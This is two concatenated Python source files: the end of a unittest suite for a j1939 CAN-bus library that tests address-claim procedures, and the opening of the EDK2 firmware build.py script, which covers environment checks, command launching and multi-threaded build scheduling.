self.assertEqual(pgn, expected_data[1])
self.assertSequenceEqual(data, expected_data[2])
def setUp(self):
"""Called before each test methode.
Method called to prepare the test fixture. This is called immediately
before calling the test method; other than AssertionError or SkipTest,
any exception raised by this method will be considered an error rather
than a test failure. The default implementation does nothing.
"""
self.can_messages = []
self.pdus = []
self.STOP_THREAD = object()
self.message_queue = queue.Queue()
self.message_thread = threading.Thread(target=self._async_can_feeder)
self.message_thread.start()
self.ecu = j1939.ElectronicControlUnit()
# redirect the send_message from the can bus to our simulation
self.ecu.send_message = self._send_message
def tearDown(self):
"""Called after each test methode.
Method called immediately after the test method has been called and
the result recorded. This is called even if the test method raised an
exception, so the implementation in subclasses may need to be
particularly careful about checking internal state. Any exception,
other than AssertionError or SkipTest, raised by this method will be
considered an additional error rather than a test failure (thus
increasing the total number of reported errors). This method will only
be called if the setUp() succeeds, regardless of the outcome of the
test method. The default implementation does nothing.
"""
self.ecu.stop()
self.message_queue.put(self.STOP_THREAD)
self.message_thread.join()
def test_addr_claim_fixed(self):
"""Test CA Address claim on the bus with fixed address
This test runs a "Single Address Capable" claim procedure with a fixed
address of 128.
"""
self.can_messages = [
(TestCA.MsgType.CANTX, 0x18EEFF80, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed
]
name = j1939.Name(
arbitrary_address_capable=0,
industry_group=j1939.Name.IndustryGroup.Industrial,
vehicle_system_instance=2,
vehicle_system=155,
function=201,
function_instance=16,
ecu_instance=2,
manufacturer_code=666,
identity_number=1234567
)
# create new CA on the bus with given NAME and ADDRESS
new_ca = self.ecu.add_ca(name=name, device_address=128)
# by starting the CA it announces the given ADDRESS on the bus
new_ca.start()
# wait until all messages are processed asynchronously
while len(self.can_messages)>0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.500)
self.assertEqual(new_ca.state, j1939.ControllerApplication.State.NORMAL)
def test_addr_claim_fixed_veto_lose(self):
"""Test CA Address claim on the bus with fixed address and a veto counterpart
This test runs a "Single Address Capable" claim procedure with a fixed
address of 128. A counterpart on the bus declines the address claimed message
with a veto and we lose our address.
"""
self.can_messages = [
(TestCA.MsgType.CANTX, 0x18EEFF80, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed
(TestCA.MsgType.CANRX, 0x18EEFF80, [83, 54, 111, 130, 83, 82, 214, 135], 0.0), # Veto from Counterpart with lower name
(TestCA.MsgType.CANTX, 0x18EEFFFE, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # CANNOT CLAIM
]
name = j1939.Name(
arbitrary_address_capable=0,
industry_group=j1939.Name.IndustryGroup.Industrial,
vehicle_system_instance=2,
vehicle_system=155,
function=201,
function_instance=16,
ecu_instance=2,
manufacturer_code=666,
identity_number=1234567
)
# create new CA on the bus with given NAME and ADDRESS
new_ca = self.ecu.add_ca(name=name, device_address=128)
# by starting the CA it announces the given ADDRESS on the bus
new_ca.start()
# wait until all messages are processed asynchronously
while len(self.can_messages)>0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.500)
self.assertEqual(new_ca.state, j1939.ControllerApplication.State.CANNOT_CLAIM)
def test_addr_claim_fixed_veto_win(self):
"""Test CA Address claim on the bus with fixed address and a veto counterpart
This test runs a "Single Address Capable" claim procedure with a fixed
address of 128. A counterpart on the bus declines the address claimed message
with a veto, but our name is less.
"""
self.can_messages = [
(TestCA.MsgType.CANTX, 0x18EEFF80, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed
(TestCA.MsgType.CANRX, 0x18EEFF80, [83, 54, 222, 130, 83, 82, 214, 135], 0.0), # Veto from Counterpart with higher name
(TestCA.MsgType.CANTX, 0x18EEFF80, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # resend Address Claimed
]
name = j1939.Name(
arbitrary_address_capable=0,
industry_group=j1939.Name.IndustryGroup.Industrial,
vehicle_system_instance=2,
vehicle_system=155,
function=201,
function_instance=16,
ecu_instance=2,
manufacturer_code=666,
identity_number=1234567
)
# create new CA on the bus with given NAME and ADDRESS
new_ca = self.ecu.add_ca(name=name, device_address=128)
# by starting the CA it announces the given ADDRESS on the bus
new_ca.start()
# wait until all messages are processed asynchronously
while len(self.can_messages)>0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.500)
self.assertEqual(new_ca.state, j1939.ControllerApplication.State.NORMAL)
def test_addr_claim_arbitrary_veto_lose(self):
"""Test CA Address claim on the bus with arbitrary capability a veto counterpart
This test runs a "Arbitrary Address Capable" claim procedure with an
address of 128. A counterpart on the bus declines the address claimed message
with a veto and we lose our address. Our device should claim the next address
(129) automatically.
"""
self.can_messages = [
(TestCA.MsgType.CANTX, 0x18EEFF80, [211, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed 128
(TestCA.MsgType.CANRX, 0x18EEFF80, [83, 54, 111, 130, 83, 82, 214, 135], 0.0), # Veto from Counterpart with lower name
(TestCA.MsgType.CANTX, 0x18EEFF81, [211, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed 129
]
name = j1939.Name(
arbitrary_address_capable=1,
industry_group=j1939.Name.IndustryGroup.Industrial,
vehicle_system_instance=2,
vehicle_system=155,
function=201,
function_instance=16,
ecu_instance=2,
manufacturer_code=666,
identity_number=1234567
)
# create new CA on the bus with given NAME and ADDRESS
new_ca = self.ecu.add_ca(name=name, device_address=128)
# by starting the CA it announces the given ADDRESS on the bus
new_ca.start()
# wait until all messages are processed asynchronously
while len(self.can_messages)>0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.500)
self.assertEqual(new_ca.state, j1939.ControllerApplication.State.NORMAL)
if __name__ == '__main__':
unittest.main()
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import print_function
import Common.LongFilePathOs as os
import re
from io import BytesIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import itertools
import multiprocessing
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import WorkspaceDatabase
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds, GenFdsApi
from collections import OrderedDict, defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if 'PATHEXT' in os.environ:
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
#
# Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
#
if "ECP_SOURCE" not in os.environ:
os.environ["ECP_SOURCE"] = mws.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
if "EFI_SOURCE" not in os.environ:
os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
if "EDK_SOURCE" not in os.environ:
os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]
#
# Unify case of characters on case-insensitive systems
#
EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))
os.environ["EFI_SOURCE"] = EfiSourceDir
os.environ["EDK_SOURCE"] = EdkSourceDir
os.environ["ECP_SOURCE"] = EcpSourceDir
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
if not os.path.exists(EcpSourceDir):
EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
elif ' ' in EcpSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
ExtraData=EcpSourceDir)
if not os.path.exists(EdkSourceDir):
if EdkSourceDir == EcpSourceDir:
EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
ExtraData=EdkSourceDir)
elif ' ' in EdkSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
ExtraData=EdkSourceDir)
if not os.path.exists(EfiSourceDir):
if EfiSourceDir == EcpSourceDir:
EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
ExtraData=EfiSourceDir)
elif ' ' in EfiSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
ExtraData=EfiSourceDir)
# check those variables on single workspace case
if not PackagesPath:
# change absolute path to relative path to WORKSPACE
if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gEfiSource = EfiSourceDir
GlobalData.gEdkSource = EdkSourceDir
GlobalData.gEcpSource = EcpSourceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if not isinstance(Command, type("")):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if not isinstance(Command, type("")):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = BuildTask._PendingQueue.keys()
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo, Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
# avoid tense loop
time.sleep(0.1)
except BaseException as X:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
